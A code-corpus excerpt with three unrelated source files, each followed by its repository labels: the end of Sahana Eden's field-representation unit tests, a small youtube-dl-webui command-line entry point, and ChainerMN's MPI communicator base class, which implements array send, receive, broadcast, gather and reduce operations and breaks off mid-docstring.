self.assertTrue(self.fac_types[1].name in representation)
self.assertTrue(self.fac_types[2].name in representation)
# -------------------------------------------------------------------------
def testRepresentListReferenceMultipleLinktoOn(self):
"""
Test Representation of list:reference, multiple values,
with linkto
"""
        s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="org_facility_type",
multiple=True,
#linkto=URL(c="org", f="facility_type", args=["[id]"]),
show_link=True)
ftable.facility_type_id.represent = renderer
org = self.org
resource = s3db.resource("org_organisation", id=org.id)
data = resource.select(["id", "test.facility_type_id"],
limit=None,
represent=True)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
names = output[fname]
self.assertTrue(isinstance(names, DIV))
from lxml import etree
tree = etree.fromstring("<div>%s</div>" % names)
links = tree.findall("a")
self.assertEqual(len(links), 3)
appname = current.request.application
a = lambda fac_type: (fac_type.name,
"/%s/org/facility_type/%s" % (appname, fac_type.id))
types = dict(a(fac_type) for fac_type in self.fac_types)
for link in links:
name = link.text
self.assertTrue(name in types)
self.assertEqual(link.get("href", None),
types[name])
# -------------------------------------------------------------------------
def testRepresentListReferenceMultipleLinktoOff(self):
s3db = current.s3db
tablename = self.tablename
fname = "%s.facility_type_id" % tablename
ftable = current.db[tablename]
renderer = S3Represent(lookup="org_facility_type",
multiple=True,
linkto=URL(c="org", f="facility_type", args=["[id]"]))
ftable.facility_type_id.represent = renderer
org = self.org
resource = s3db.resource("org_organisation", id=org.id)
data = resource.select(["id", "test.facility_type_id"],
limit=None,
represent=True,
show_links=False)
result = data["rows"]
self.assertEqual(renderer.queries, 1)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 1)
output = result[0]
self.assertTrue(isinstance(output, Storage))
self.assertTrue(fname in output)
representation = output[fname].split(", ")
self.assertEqual(len(representation), 3)
self.assertTrue(self.fac_types[0].name in representation)
self.assertTrue(self.fac_types[1].name in representation)
self.assertTrue(self.fac_types[2].name in representation)
# -------------------------------------------------------------------------
def tearDown(self):
del current.model.components["org_organisation"]["test"]
current.db.rollback()
current.auth.override = False
# -------------------------------------------------------------------------
@classmethod
def tearDownClass(cls):
try:
current.db[cls.tablename].drop()
except:
pass
# =============================================================================
class S3ExportLazyFKRepresentationTests(unittest.TestCase):
""" Test lazy representations of foreign keys in exports """
# -------------------------------------------------------------------------
def setUp(self):
self.tablename = tablename = "export_lazy_fk_represent"
db = current.db
db.define_table(tablename,
Field("location_id",
"reference gis_location"),
Field("organisation_id",
"reference org_organisation"),
Field("facility_type_id",
"list:reference org_facility_type"),
*s3_meta_fields())
current.auth.override = True
s3db = current.s3db
# Create locations
locations = (Storage(name="FK Represent TestLocation 1"),
Storage(name="FK Represent TestLocation 2"))
ltable = s3db.gis_location
for i in xrange(len(locations)):
location = locations[i]
location_id = ltable.insert(**location)
location["id"] = location_id
self.locations = Storage([(l.id, l) for l in locations])
# Create facility types
fac_types = (Storage(name="FK Represent TestFacType P"),
Storage(name="FK Represent TestFacType Q"),
Storage(name="FK Represent TestFacType R"))
ttable = s3db.org_facility_type
for i in xrange(len(fac_types)):
fac_type = fac_types[i]
fac_type_id = ttable.insert(**fac_type)
fac_type["id"] = fac_type_id
self.fac_types = Storage([(t.id, t) for t in fac_types])
# Create organisation
org = Storage(name="FK Represent TestOrg B")
otable = s3db.org_organisation
org_id = otable.insert(**org)
org["id"] = org_id
s3db.update_super(otable, org)
self.org = org
# Create test records
facs = (Storage(organisation_id=org.id,
facility_type_id=[fac_types[0].id, fac_types[1].id],
location_id=locations[0].id),
Storage(organisation_id=org.id,
facility_type_id=[fac_types[1].id, fac_types[2].id],
location_id=locations[1].id))
for i in xrange(len(facs)):
fac = facs[i]
fac_id = db[tablename].insert(**fac)
fac["id"] = fac_id
self.facs = facs
# -------------------------------------------------------------------------
def testRepresentReferenceSingleNoLinkto(self):
"""
Test Representation of reference, single value,
without linkto
"""
s3db = current.s3db
resource = s3db.resource(self.tablename,
id=[fac.id for fac in self.facs])
table = resource.table
# Attach lazy renderers
org_id_renderer = S3Represent(lookup="org_organisation")
table.organisation_id.represent = org_id_renderer
fac_type_renderer = S3Represent(lookup="org_facility_type",
multiple=True)
table.facility_type_id.represent = fac_type_renderer
loc_id_renderer = S3Represent(lookup="gis_location",
linkto=URL(c="gis", f="location", args=["[id]"]))
table.location_id.represent = loc_id_renderer
# Export with IDs
current.xml.show_ids = True
tree = resource.export_tree(dereference=False)
root = tree.getroot()
locations = self.locations
fac_types = self.fac_types
org = self.org
# Check correct representation in exports
for fac in self.facs:
# Find the element
elem = root.findall("resource[@id='%s']" % fac.id)
elem = elem[0] if len(elem) else None
self.assertNotEqual(elem, None)
find = lambda name: elem.findall("reference[@field='%s']" % name)
organisation_id = find("organisation_id")
organisation_id = organisation_id[0] \
if len(organisation_id) else None
self.assertNotEqual(organisation_id, None)
self.assertEqual(organisation_id.text, org.name)
location_id = find("location_id")
location_id = location_id[0] \
if len(location_id) else None
self.assertNotEqual(location_id, None)
location = locations[fac.location_id]
self.assertEqual(location_id.text, location.name)
facility_type_id = find("facility_type_id")
facility_type_id = facility_type_id[0] \
if len(facility_type_id) else None
self.assertNotEqual(facility_type_id, None)
ftypes = ", ".join([fac_types[i].name
for i in fac.facility_type_id])
self.assertEqual(facility_type_id.text, ftypes)
# Check that only 1 query per renderer was needed for the export
self.assertEqual(org_id_renderer.queries, 1)
self.assertEqual(fac_type_renderer.queries, 1)
self.assertEqual(loc_id_renderer.queries, 1)
# -------------------------------------------------------------------------
def tearDown(self):
db = current.db
db.rollback()
current.auth.override = False
try:
db[self.tablename].drop()
except:
pass
# =============================================================================
class S3ReusableFieldTests(unittest.TestCase):
""" Test multiple named widgets in reusable fields """
# -------------------------------------------------------------------------
def widget1(self):
""" Dummy widget """
pass
def widget2(self):
""" Dummy widget """
pass
def widget3(self):
""" Dummy widget """
pass
# -------------------------------------------------------------------------
def testWidgetOverrideWithoutDefault(self):
""" Test setting the widget in the instance (no default) """
rf = S3ReusableField("test", "integer")
# Default None
field = rf()
self.assertEqual(field.widget, None)
# Widget-parameter overrides default
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# -------------------------------------------------------------------------
def testWidgetOverrideWithDefault(self):
""" Test overriding the default widget in the instance """
rf = S3ReusableField("test", "integer",
widget=self.widget1)
# Default widget
field = rf()
self.assertEqual(field.widget, self.widget1)
# Widget-parameter overrides default
field = rf(widget=self.widget2)
self.assertEqual(field.widget, self.widget2)
# -------------------------------------------------------------------------
def testSingleWidget(self):
""" Test using widget set with single widget """
rf = S3ReusableField("test", "integer",
widgets=self.widget1)
# Default
field = rf()
self.assertEqual(field.widget, self.widget1)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, self.widget1)
# Override
field = rf(widget=self.widget2)
self.assertEqual(field.widget, self.widget2)
# Undefined widget
self.assertRaises(NameError, rf, widget="alternative")
# -------------------------------------------------------------------------
def testMultipleWidgets(self):
""" Test using widget set with multiple widgets """
rf = S3ReusableField("test", "integer",
widgets={"default": self.widget1,
"alternative": self.widget2,
},
)
# Using default from set
field = rf()
self.assertEqual(field.widget, self.widget1)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, self.widget1)
# Other choice
field = rf(widget="alternative")
self.assertEqual(field.widget, self.widget2)
# Override
field = rf(widget=self.widget3)
self.assertEqual(field.widget, self.widget3)
# Undefined widget
self.assertRaises(NameError, rf, widget="other")
# -------------------------------------------------------------------------
def testMultipleWidgetsWithDefault(self):
""" Test using widget set with multiple widgets and override default """
rf = S3ReusableField("test", "integer",
widgets={"default": self.widget1,
"alternative": self.widget2,
},
widget=self.widget3,
)
# "widget"-setting overrides "default"
field = rf()
self.assertEqual(field.widget, self.widget3)
# "widget"-setting overrides "default"
field = rf(widget="default")
self.assertEqual(field.widget, self.widget3)
# Other alternatives still available
field = rf(widget="alternative")
self.assertEqual(field.widget, self.widget2)
# And can still override
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# Undefined widget
self.assertRaises(NameError, rf, widget="other")
# -------------------------------------------------------------------------
def testFallbackWithDefault(self):
""" Test fallback to default widget """
rf = S3ReusableField("test", "integer",
widget=self.widget1,
widgets={"alternative": self.widget2},
)
# Standard fallback
field = rf()
self.assertEqual(field.widget, self.widget1)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, self.widget1)
# Alternative
field = rf(widget="alternative")
self.assertEqual(field.widget, self.widget2)
# Override
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# Undefined widget
self.assertRaises(NameError, rf, widget="other")
# -------------------------------------------------------------------------
def testExplicitNone(self):
""" Test explicit None-widget in instance """
rf = S3ReusableField("test", "integer",
widgets={"default": self.widget1,
"alternative": self.widget2,
},
widget=self.widget3,
)
# Standard fallback
field = rf(widget=None)
self.assertEqual(field.widget, None)
# -------------------------------------------------------------------------
def testFallbackWithoutDefault(self):
""" Test fallback to None """
rf = S3ReusableField("test", "integer",
widgets={"alternative": self.widget2},
)
# Standard fallback
field = rf()
self.assertEqual(field.widget, None)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, None)
# Alternative
field = rf(widget="alternative")
self.assertEqual(field.widget, self.widget2)
# Override
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# Undefined widget
self.assertRaises(NameError, rf, widget="other")
# -------------------------------------------------------------------------
def testFallbackWithoutWidgets(self):
""" Test fallback to None """
rf = S3ReusableField("test", "integer")
# Standard fallback
field = rf()
self.assertEqual(field.widget, None)
# Deliberate default
field = rf(widget="default")
self.assertEqual(field.widget, None)
# Alternative
self.assertRaises(NameError, rf, widget="alternative")
# Override
field = rf(widget=self.widget1)
self.assertEqual(field.widget, self.widget1)
# Undefined widget
self.assertRaises(NameError, rf, widget="other")
# =============================================================================
def run_suite(*test_classes):
""" Run the test suite """
loader = unittest.TestLoader()
suite = unittest.TestSuite()
for test_class in test_classes:
tests = loader.loadTestsFromTestCase(test_class)
suite.addTests(tests)
if suite is not None:
unittest.TextTestRunner(verbosity=2).run(suite)
return
if __name__ == "__main__":
run_suite(
S3RepresentTests,
S3ExtractLazyFKRepresentationTests,
S3ExportLazyFKRepresentationTests,
S3ReusableFieldTests,
)
# END ========================================================================
|
gnarula/eden_deployment
|
modules/unit_tests/s3/s3fields.py
|
Python
|
mit
| 47,235
| 0.001651
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from argparse import ArgumentParser
from .core import Core
def getopt(argv):
parser = ArgumentParser(description='Another webui for youtube-dl')
parser.add_argument('-c', '--config', metavar="CONFIG_FILE", help="config file")
parser.add_argument('--host', metavar="ADDR", help="the address server listens on")
parser.add_argument('--port', metavar="PORT", help="the port server listens on")
    # parse the supplied argv (argparse falls back to sys.argv[1:] when None)
    return vars(parser.parse_args(argv))
def main(argv=None):
from os import getpid
print("pid is {}".format(getpid()))
print("-----------------------------------")
cmd_args = getopt(argv)
core = Core(cmd_args=cmd_args)
core.start()
|
d0u9/youtube-dl-webui
|
youtube_dl_webui/__init__.py
|
Python
|
gpl-2.0
| 755
| 0.005298
|
import mpi4py
import numpy
import chainer
import chainer.backends
import chainer.utils
from chainer.utils import collections_abc
from chainermn.communicators import _communication_utility
from chainermn.communicators._communication_utility import chunked_bcast_obj
from chainermn.communicators import _memory_utility
from chainermn.communicators import communicator_base
_dtype_mpi_type = {
# see the definition of mpi4py.MPI._typedict (in mpi4py/MPI/typemap.pxi)
numpy.dtype(numpy.int32): mpi4py.MPI._typedict['i'],
numpy.dtype(numpy.int64): mpi4py.MPI._typedict['l'],
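    # note: no native MPI half-precision type is used; float16 payloads are
    # cast to float32 before transfer (see send()/recv() below), hence 'f'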
numpy.dtype(numpy.float16): mpi4py.MPI._typedict['f'],
numpy.dtype(numpy.float32): mpi4py.MPI._typedict['f'],
numpy.dtype(numpy.float64): mpi4py.MPI._typedict['d'],
}
def _check_dtype(caller, msgtype):
dtype = msgtype.dtype
if dtype not in _dtype_mpi_type.keys():
raise TypeError(
'{} does not support dtype {}'.format(caller, dtype))
def _check_dtypes_are_same(msgtypes):
dtypes = [msgtype.dtype for msgtype in msgtypes]
if any(dtypes[0] != dtype for dtype in dtypes):
raise TypeError('all dtypes must be the same')
def _is_numpy_array(array):
return isinstance(array, numpy.ndarray)
def _is_cupy_array(array):
return chainer.backend.get_array_module(array) is not numpy
def _cnt_to_dsp(cnt):
"""Utility to convert length array to cumulative array."""
return [0] + numpy.cumsum(cnt)[:-1].tolist()
def _get_mpi_type(msgtype):
dtype = msgtype.dtype
if dtype not in _dtype_mpi_type.keys():
raise TypeError(
'dtype {} is not supported by MpiCommunicator'.format(dtype))
return _dtype_mpi_type[dtype]
class _MessageType(object):
def __init__(self, obj):
if _is_numpy_array(obj) or _is_cupy_array(obj):
self.is_host = _is_numpy_array(obj)
self.is_tuple = False
self.narr = 1
self.ndims = [obj.ndim]
self.shapes = [obj.shape]
self.dtype = obj.dtype
elif isinstance(obj, collections_abc.Iterable):
if all(map(_is_numpy_array, obj)):
self.is_host = True
elif all(map(_is_cupy_array, obj)):
self.is_host = False
else:
raise ValueError(
'All message objects must be either numpy or cupy arrays.')
self.is_tuple = True
self.narr = len(obj)
self.ndims = [x.ndim for x in obj]
self.shapes = [x.shape for x in obj]
dtypes = [x.dtype for x in obj]
if not all(dtype == dtypes[0] for dtype in dtypes):
raise TypeError(
'Message objects must be the same dtype')
self.dtype = dtypes[0]
else:
raise TypeError(
'Message object must be numpy/cupy array or its tuple.')
def get_array_module(self):
if self.is_host:
return numpy
else:
import cupy
return cupy
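# e.g. (sketch): _MessageType(numpy.zeros((2, 3), dtype=numpy.float32)) has
# is_host=True, is_tuple=False, shapes=[(2, 3)] and dtype float32, while a
# tuple of cupy arrays yields is_host=False and is_tuple=True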
class MpiCommunicatorBase(communicator_base.CommunicatorBase):
'''MpiCommunicatorBase
Implementation of communicator interface defined by
:class:`CommunicatorBase`. This communicator assumes MPI4py and
all ChainerMN processes are invoked by ``mpirun`` (``mpiexec``)
    command. Note that this class lacks several important methods, such as
    ``multi_node_mean_grad``, which must be implemented with a specific
    algorithm; see the hierarchical or pure_nccl communicators for examples.
'''
def __init__(self, mpi_comm):
self.mpi_comm = mpi_comm
self._init_ranks()
@property
def rank(self):
return self.mpi_comm.rank
@property
def size(self):
return self.mpi_comm.size
@property
def intra_rank(self):
return self._intra_rank
@property
def intra_size(self):
return self._intra_size
@property
def inter_rank(self):
return self._inter_rank
@property
def inter_size(self):
return self._inter_size
def split(self, color, key):
return self.__class__(mpi_comm=self.mpi_comm.Split(color, key))
def alltoall(self, xs):
"""A primitive of inter-process all-to-all function.
This method tries to invoke all-to-all communication within the
communicator. All processes in the communicator are expected to
invoke ``alltoall()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
If ``xs`` is numpy array, the returned array will also be allocated
as numpy array. Additionally, when ``xs`` is cupy array, the returned
array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
xs (tuple of numpy/cupy array)
Returns:
ys (tuple of numpy/cupy array):
Received arrays. The length of tuple equals to
the communicator size.
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.alltoall')
if len(xs) != self.size:
raise ValueError(
'The length of data must be same as communicator size.')
# Type check.
msgtypes = [_MessageType(x) for x in xs]
for msgtype in msgtypes:
_check_dtype('alltoall', msgtype)
_check_dtypes_are_same(msgtypes)
send_msgtype = msgtypes[0]
msgtypes = self.mpi_comm.alltoall(msgtypes)
_check_dtypes_are_same(msgtypes)
recv_msgtype = msgtypes[0]
# Collective communication.
slens = [x.size for x in xs]
xp = chainer.backend.get_array_module(*xs)
sbuf = xp.hstack([x.reshape(-1) for x in xs])
shapes = [msgtype.shapes[0] for msgtype in msgtypes]
rlens = [chainer.utils.size_of_shape(s) for s in shapes]
rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype)
if xp is not numpy:
sbuf = _memory_utility.get_device_memory_pointer(sbuf)
chainer.cuda.Stream.null.synchronize()
self.mpi_comm.Alltoallv(
[sbuf, (slens, _cnt_to_dsp(slens)), _get_mpi_type(send_msgtype)],
[_memory_utility.get_device_memory_pointer(rbuf),
(rlens, _cnt_to_dsp(rlens)), _get_mpi_type(recv_msgtype)])
ys = [rbuf[i:i + l].reshape(s)
for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)]
return tuple(ys)
def send(self, data, dest, tag):
"""A primitive for inter-process transmitter.
This method sends numpy-array to target process.
The target process is expected to invoke ``recv()``.
This method relies on mpi4py fast communication optimized for
numpy arrays, which discards any information attached to
        chainer.Variable objects; please be aware of this.
Args:
data: data to be sent (tuple, list or raw numpy/cupy array)
dest (int): Target process specifier.
tag (int): Message ID (MPI feature).
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.send')
msgtype = _MessageType(data)
_check_dtype('send', msgtype)
"""We use ssend() instead of send() to pass unittests.
If we don't use it, an error occurs in
test_point_to_point_communication.py
when using MVAPICH2-2.2 and GPUs.
"""
self.mpi_comm.ssend(msgtype, dest=dest, tag=tag)
# Type check.
if not msgtype.is_tuple:
data = [data]
for array in data:
if numpy.float16 == array.dtype:
array = array.astype(numpy.float32)
if chainer.backend.get_array_module(array) is not numpy:
chainer.cuda.Stream.null.synchronize()
array = (_memory_utility.get_device_memory_pointer(array),
_get_mpi_type(msgtype))
else:
array = numpy.ascontiguousarray(array)
"""We use Ssend() for the same reason as using ssend()."""
self.mpi_comm.Ssend(array, dest=dest, tag=tag)
def recv(self, source, tag):
"""A primitive of inter-process receiver.
This method tries to receive numpy-array from target process.
The target process is expected to invoke ``send()``.
This method relies on mpi4py fast communication optimized for
numpy arrays, which discards any information attached to
        chainer.Variable objects; please be aware of this.
If the corresponding ``send()`` is invoked with cupy array,
the returned array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
source (int): Target process specifier.
tag (int): Message ID (MPI feature).
Returns:
data (tuple of numpy/cupy array or numpy/cupy array):
Received data. If ``send()`` is invoked with tuple data,
it is also tuple. Otherwise, it is a vanilla numpy/cupy array.
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.recv')
msgtype = self.mpi_comm.recv(source=source, tag=tag)
xp = msgtype.get_array_module()
if numpy.float16 == msgtype.dtype:
comm_dtype = numpy.float32
else:
comm_dtype = msgtype.dtype
if msgtype.is_tuple:
msg = []
for shape in msgtype.shapes:
buf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=comm_dtype)
rtype = _get_mpi_type(msgtype)
self.mpi_comm.Recv(
_memory_utility.array_to_buffer_object(buf, rtype),
source=source, tag=tag)
if numpy.float16 == msgtype.dtype:
buf = buf.astype(numpy.float16)
msg.append(buf.reshape(shape))
return tuple(msg)
else:
assert len(msgtype.shapes) == 1
shape = msgtype.shapes[0]
buf = xp.empty([chainer.utils.size_of_shape(shape)],
dtype=comm_dtype)
rtype = _get_mpi_type(msgtype)
self.mpi_comm.Recv(
_memory_utility.array_to_buffer_object(buf, rtype),
source=source, tag=tag)
if numpy.float16 == msgtype.dtype:
buf = buf.astype(numpy.float16)
return buf.reshape(shape)
def bcast(self, x, root=0):
"""A primitive of inter-process broadcast communication.
This method tries to invoke broadcast communication within the
communicator. All processes in the communicator are expected to
invoke ``broadcast()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
If ``bcast()`` is invoked with cupy array in the root process,
the returned array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
x (numpy/cupy array): Array to be broadcasted.
root (int): Rank of root process.
Returns:
ys (tuple of numpy/cupy array): Received arrays.
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.bcast')
is_master = self.mpi_comm.rank == root
if is_master:
msgtype = _MessageType(x)
_check_dtype('bcast', msgtype)
if msgtype.is_tuple:
raise TypeError('Tuple data cannot be broadcasted')
msgtype = self.mpi_comm.bcast(msgtype, root)
shape = msgtype.shapes[0]
buf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
self.mpi_comm.Bcast(buf, root)
return x
else:
msgtype = self.mpi_comm.bcast(None, root)
xp = msgtype.get_array_module()
shape = msgtype.shapes[0]
buf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=msgtype.dtype)
buftype = _get_mpi_type(msgtype)
self.mpi_comm.Bcast(
_memory_utility.array_to_buffer_object(buf, buftype),
root)
return buf.reshape(shape)
def gather(self, x, root=0):
"""A primitive of inter-process gather communication.
This method tries to invoke gather communication within the
communicator. All processes in the communicator are expected to
invoke ``gather()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
If ``x`` is numpy array, the received data will also be allocated
as numpy array. Additionally, when ``x`` is cupy array, the returned
array will be placed at current device
(``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
regardless of which device the argument is placed at remote nodes.
Args:
x (numpy/cupy array): Array to be gathered.
root (int): Rank of root process.
Returns:
ys (tuple of numpy/cupy array):
Received arrays. ``None`` for non-root processes.
"""
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.gather')
is_master = self.mpi_comm.rank == root
msgtype = _MessageType(x)
_check_dtype('gather', msgtype)
msgtypes = self.mpi_comm.gather(msgtype, root)
if is_master:
_check_dtypes_are_same(msgtypes)
for msgtype in msgtypes:
if msgtype.is_tuple:
raise TypeError('gather cannot handle tuple data')
assert len(msgtype.shapes) == 1
xp = chainer.backend.get_array_module(x)
sbuf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
shapes = [mty.shapes[0] for mty in msgtypes]
rlens = [chainer.utils.size_of_shape(s) for s in shapes]
rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype)
if xp is not numpy:
chainer.cuda.Stream.null.synchronize()
self.mpi_comm.Gatherv(
sbuf,
[_memory_utility.get_device_memory_pointer(rbuf),
(rlens, _cnt_to_dsp(rlens)), _get_mpi_type(msgtype)],
root)
ys = [rbuf[i:i + l].reshape(s)
for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)]
return tuple(ys)
else:
sbuf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
self.mpi_comm.Gatherv(sbuf, None, root)
return None
def allgather(self, x):
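        # like gather(), but every rank receives the full tuple of arrays;
        # tuple inputs are rejected and all dtypes must match (checked below)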
chainer.utils.experimental(
'chainermn.communicators.MpiCommunicatorBase.allgather')
msgtype = _MessageType(x)
_check_dtype('allgather', msgtype)
msgtypes = self.mpi_comm.allgather(msgtype)
_check_dtypes_are_same(msgtypes)
# Type check.
for msgtype in msgtypes:
if msgtype.is_tuple:
raise TypeError('allgather cannot handle tuple data')
assert len(msgtype.shapes) == 1
# Collective communication.
xp = chainer.backend.get_array_module(x)
shapes = [msgtype.shapes[0] for msgtype in msgtypes]
sbuf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
rlens = [chainer.utils.size_of_shape(s) for s in shapes]
rbuf = xp.empty([sum(rlens)], dtype=msgtype.dtype)
if xp is not numpy:
chainer.cuda.Stream.null.synchronize()
self.mpi_comm.Allgatherv(
sbuf,
[_memory_utility.get_device_memory_pointer(rbuf),
(rlens, _cnt_to_dsp(rlens)), _get_mpi_type(msgtype)])
ys = [rbuf[i:i + l].reshape(s)
for i, l, s in zip(_cnt_to_dsp(rlens), rlens, shapes)]
return tuple(ys)
def allreduce(self, x):
"""A primitive of inter-process allreduce communication.
This method tries to invoke allreduce communication within the
communicator. All processes in the communicator are expected to
invoke ``allreduce()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
        Note that this method can only handle arrays of the same shape
        across all processes, and cannot handle tuple data.
        If ``x`` is a numpy array, the result will also be allocated
        as a numpy array. Additionally, when ``x`` is a cupy array, the
        returned array will be placed on the current device
        (``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
        regardless of which device the argument is placed on at remote nodes.
Args:
x (numpy/cupy array): An array to apply allreduce operation.
Returns:
            ys (numpy/cupy array): An array to which allreduce
                (currently SUM only) has been applied.
"""
msgtype = _MessageType(x)
_check_dtype('allreduce', msgtype)
if msgtype.is_tuple:
raise TypeError('allreduce cannot handle tuple data')
xp = chainer.backend.get_array_module(x)
# TODO(kuenishi): do we check all messages have same shape and dims?
# Source buffer
sbuf = _memory_utility.array_to_buffer_object(
x, _get_mpi_type(msgtype))
# Destination buffer and its object
shape = msgtype.shapes[0]
dbuf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=msgtype.dtype)
dbuf_buffer_obj = _memory_utility.array_to_buffer_object(
dbuf, _get_mpi_type(msgtype))
self.mpi_comm.Allreduce(sbuf, dbuf_buffer_obj)
return dbuf.reshape(shape)
def scatter(self, xs, root=0):
"""A primitive of inter-process scatter communication.
This method tries to invoke scatter communication within the
communicator. All processes in the communicator are expected to
invoke ``scatter()``. This method relies on mpi4py fast communication
optimized for numpy arrays, as well as ``send()`` and ``recv()``.
        If ``xs`` is a tuple, each element is sent to a different process.
        The length of the tuple must be the same as the communicator size.
        If ``xs`` is a ``numpy.ndarray``, it is split along the first
        axis and sent to different processes. For non-root processes, ``xs``
        is allowed to be any value (it will be ignored).
        If ``scatter()`` is invoked with a cupy array in the root process,
        the returned array will be placed on the current device
        (``https://docs-cupy.chainer.org/en/stable/tutorial/basic.html#current-device``)
        regardless of which device the argument is placed on at remote nodes.
Args:
xs (tuple of numpy/cupy array): Arrays to be scattered.
root (int): Rank of root process.
Returns:
ys (numpy/cupy array): Received arrays.
"""
chainer.utils.experimental(
'chainermn.communicators.CommunicatorBase.scatter')
is_master = self.mpi_comm.rank == root
if is_master:
# Type check.
msgtype = _MessageType(xs)
_check_dtype('scatter', msgtype)
if msgtype.is_tuple:
if len(msgtype.shapes) != self.size:
raise ValueError(
'the length of xs must be consistent '
'with communicator size')
xp = chainer.backend.get_array_module(*xs)
msgtype = tuple([_MessageType(x) for x in xs])
shapes = [mty.shapes[0] for mty in msgtype]
# concatenate([x.reshape(-1) ... ], axis=0) will fail
xs = xp.concatenate([x.reshape(1, -1) for x in xs], axis=1)
else:
assert len(msgtype.shapes) == 1
if msgtype.shapes[0][0] != self.mpi_comm.size:
raise ValueError(
'scatter received inconsistent number of inputs '
'with communicator size')
xp = chainer.backend.get_array_module(xs)
msgtype = tuple([_MessageType(xs[0])
for _ in range(self.size)])
shapes = [xs.shape[1:] for _ in range(self.size)]
msgtype = self.mpi_comm.scatter(msgtype, root)
shape = msgtype.shapes[0]
# Collective communication.
slens = [chainer.utils.size_of_shape(s) for s in shapes]
sbuf = _memory_utility.get_device_memory_pointer(xs)
rbuf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=msgtype.dtype)
rtype = _get_mpi_type(msgtype)
if xp is not numpy:
chainer.cuda.Stream.null.synchronize()
self.mpi_comm.Scatterv(
[sbuf, (slens, _cnt_to_dsp(slens)), _get_mpi_type(msgtype)],
_memory_utility.array_to_buffer_object(rbuf, rtype), root)
return rbuf.reshape(shape)
else: # slave processes
msgtypes = self.mpi_comm.scatter(None, root)
xp = msgtypes.get_array_module()
shape = msgtypes.shapes[0]
rbuf = xp.empty(
[chainer.utils.size_of_shape(shape)], dtype=msgtypes.dtype)
rtype = _get_mpi_type(msgtypes)
self.mpi_comm.Scatterv(
None,
_memory_utility.array_to_buffer_object(rbuf, rtype),
root)
return rbuf.reshape(shape)
# Objects
def send_obj(self, obj, dest, tag=0):
self.mpi_comm.send(obj, dest=dest, tag=tag)
def recv_obj(self, source, status=None, tag=mpi4py.MPI.ANY_TAG):
return self.mpi_comm.recv(source=source, status=status, tag=tag)
def bcast_obj(self, obj, max_buf_len=256 * 1024 * 1024, root=0):
return chunked_bcast_obj(obj, self.mpi_comm,
max_buf_len=max_buf_len,
root=root)
def gather_obj(self, obj, root=0):
return self.mpi_comm.gather(obj, root=root)
def allreduce_obj(self, obj):
# Summation by default
return self.mpi_comm.allreduce(obj)
def bcast_data(self, model):
for _, param in sorted(model.namedparams()):
if param.data is not None:
data = param.data
is_float16 = param.data.dtype == numpy.float16
if is_float16:
data = data.astype(numpy.float32)
buf = _memory_utility.array_to_buffer_object(data)
self.mpi_comm.Bcast(buf)
if is_float16:
param.data = data.astype(numpy.float16)
# Private methods
def _init_ranks(self):
my_ranks = _communication_utility.init_ranks(self.mpi_comm)
assert my_ranks[0] == self.mpi_comm.rank
self._intra_rank = my_ranks[1]
self._intra_size = my_ranks[2]
self._inter_rank = my_ranks[3]
self._inter_size = my_ranks[4]
def _check_ready_to_allreduce(self, array_a, array_b):
my_shapes = ((None if array_a is None else array_a.shape,
None if array_a is None else array_a.dtype),
array_b.shape,
array_b.dtype)
all_shapes = self.gather_obj((self.rank, my_shapes))
if self.rank == 0:
for rank, shapes in all_shapes:
if my_shapes != shapes:
raise ValueError('Shape does not match: {}'
' at rank 0 while {} at rank {}'
.format(my_shapes, shapes, rank))
def _ensure_all_finite(self, array):
xp = chainer.backend.get_array_module(array)
if not xp.isfinite(array).all():
raise ValueError('Parameters diverged after allreduce.')
def _multi_node_mean(self, sendbuf, recvbuf):
"""Compute mean of each element on each processes.
The function compute mean of each element in ``sendbuf`` on each
processes. The result is stored in ``recvbuf``.
If ``sendbuf`` is ``None``, the function compute mean of each element
